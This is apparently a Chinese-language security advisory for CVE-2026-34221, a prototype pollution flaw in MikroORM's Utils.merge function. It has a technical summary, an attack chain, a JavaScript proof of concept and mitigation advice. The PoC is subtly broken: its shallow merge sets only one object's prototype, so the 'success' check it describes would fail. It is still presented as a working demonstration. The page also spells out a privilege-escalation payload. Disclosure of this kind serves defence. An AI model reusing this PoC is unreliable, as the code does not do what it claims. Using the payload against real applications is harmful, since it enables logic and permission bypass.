CVE-2026-34221 CVSS 9.1 严重

CVE-2026-34221 MikroORM原型污染漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34221

漏洞类型

原型污染

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MikroORM

漏洞概述

MikroORM是一个基于Node.js的TypeScript ORM框架。在6.6.10和7.0.6版本之前，其内部使用的Utils.merge辅助函数存在原型污染漏洞。该函数在合并对象结构时，未能有效过滤__proto__、constructor或prototype等特殊属性键。攻击者可以通过控制输入数据，利用此漏洞修改JavaScript对象的原型，进而可能影响应用程序的完整性或可用性。该问题已在后续版本中修复，建议受影响用户尽快升级。

技术细节

该漏洞的核心在于MikroORM内部使用的Utils.merge辅助函数未能正确处理对象属性键。在JavaScript中，__proto__、constructor和prototype是具有特殊意义的属性，用于操作对象的原型链。当攻击者能够控制传入Utils.merge函数的输入数据时，可以通过构造包含这些特殊键的恶意JSON对象（例如{"__proto__": {"isAdmin": true}}）来实施攻击。由于漏洞版本中的合并函数未对这些键名进行过滤或禁止，恶意对象会被合并到目标对象的原型中。一旦原型被污染，应用程序中所有基于该原型的对象都会继承恶意的属性或方法。这可能导致应用程序逻辑被篡改、权限绕过，甚至引发拒绝服务，从而严重威胁系统的完整性和可用性。

攻击链分析

STEP 1

侦察阶段

攻击者确认目标应用使用了存在漏洞的MikroORM版本（< 6.6.10 或 < 7.0.6），并寻找接受用户输入并调用Utils.merge进行对象合并的接口。

STEP 2

载荷构造

攻击者构造包含特定原型键（如__proto__、constructor）的恶意JSON数据，旨在向Object.prototype中注入恶意属性。

STEP 3

漏洞利用

将构造好的恶意数据发送给目标应用。当Utils.merge函数处理该数据时，由于缺乏校验，恶意属性被成功写入JavaScript对象原型中。

STEP 4

影响达成

原型污染生效，应用后续逻辑中访问的对象均继承了恶意属性，可能导致逻辑绕过、权限提升或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-34221
// This demonstrates how a malicious payload can pollute the prototype
// using the vulnerable Utils.merge function in MikroORM.

// Simulating the vulnerable Utils.merge behavior
function vulnerableMerge(target, source) {
    for (const key in source) {
        if (source.hasOwnProperty(key)) {
            target[key] = source[key];
        }
    }
    return target;
}

// 1. Create a safe object
const safeObject = {};

// 2. Create a malicious payload targeting the prototype
// The payload contains the __proto__ key
const maliciousPayload = JSON.parse('{"__proto__": {"polluted": true}}');

// 3. Perform the merge operation (Vulnerable Action)
console.log("[+] Merging malicious payload into object...");
vulnerableMerge(safeObject, maliciousPayload);

// 4. Verify the pollution
// If the pollution is successful, empty objects will now have the 'polluted' property
const checkObject = {};
if (checkObject.polluted === true) {
    console.log("[!] SUCCESS: Prototype pollution detected!");
    console.log("    Empty object property 'polluted':", checkObject.polluted);
} else {
    console.log("[-] FAILED: No pollution detected.");
}

影响范围

MikroORM < 6.6.10

MikroORM >= 7.0.0, < 7.0.6

防御指南

临时缓解措施

如果无法立即升级，建议在调用合并函数前实施输入清洗逻辑，使用白名单机制仅允许安全的属性键进行合并，或者使用Map对象代替普通Object以避免原型链污染风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表